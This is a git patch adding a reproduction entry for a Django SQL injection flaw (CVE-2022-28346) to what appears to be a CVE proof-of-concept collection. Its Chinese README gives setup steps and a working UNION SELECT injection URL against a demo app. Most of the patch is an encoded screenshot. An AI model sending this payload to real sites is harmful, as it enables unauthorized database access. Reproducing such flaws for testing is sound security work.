Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .gitmodules | 3 +++ cve/django/2022/CVE-2022-28346/POC_env | 1 + cve/django/2022/CVE-2022-28346/README.md | 20 ++++++++++++++++ .../image-20220426224053969.png | Bin 0 -> 47163 bytes cve/django/2022/yaml/CVE-2022-28346.yaml | 22 ++++++++++++++++++ 5 files changed, 46 insertions(+) create mode 160000 cve/django/2022/CVE-2022-28346/POC_env create mode 100644 cve/django/2022/CVE-2022-28346/README.md create mode 100644 cve/django/2022/CVE-2022-28346/image-20220426224053969.png create mode 100644 cve/django/2022/yaml/CVE-2022-28346.yaml diff --git a/.gitmodules b/.gitmodules index dc54b713..389186c0 100644 --- a/.gitmodules +++ b/.gitmodules @@ -2,3 +2,6 @@ url = https://gitee.com/zhangqichen131/cve-2022-22978-poc-environment path = cve/java-spring-security/2022/CVE-2022-22978/POC_environment +[submodule "cve/django/2022/CVE-2022-28346/POC_env"] + path = cve/django/2022/CVE-2022-28346/POC_env + url = https://github.com/DeEpinGh0st/CVE-2022-28346 diff --git a/cve/django/2022/CVE-2022-28346/POC_env b/cve/django/2022/CVE-2022-28346/POC_env new file mode 160000 index 00000000..5a28f5e3 --- /dev/null +++ b/cve/django/2022/CVE-2022-28346/POC_env @@ -0,0 +1 @@ +Subproject commit 5a28f5e3fa893ea64e81488ef736665d17908499 diff --git a/cve/django/2022/CVE-2022-28346/README.md b/cve/django/2022/CVE-2022-28346/README.md new file mode 100644 index 00000000..d4390216 --- /dev/null +++ b/cve/django/2022/CVE-2022-28346/README.md @@ -0,0 +1,20 @@ +### CVE-2022-28346 +Django QuerySet.annotate(), aggregate(), extra() SQL 注入 + +### 环境初始化 +``` +1.python manage.py makemigrations +2.python manage.py migrate +3.访问http://x.x.x.x:8000/ 插入初始化数据 +``` + +### 漏洞复现 + +``` +访问http://x.x.x.x:8000/demo +POC: http://x.x.x.x:8000/demo?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" -- +``` + +![image-20220426224053969](./image-20220426224053969.png) + +**验证漏洞存在** \ No newline at end of file diff --git a/cve/django/2022/CVE-2022-28346/image-20220426224053969.png b/cve/django/2022/CVE-2022-28346/image-20220426224053969.png new file mode 100644 index 0000000000000000000000000000000000000000..14bc949d3bed1b5cf28f4b7e973e7f73df6c608f GIT binary patch literal 47163 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 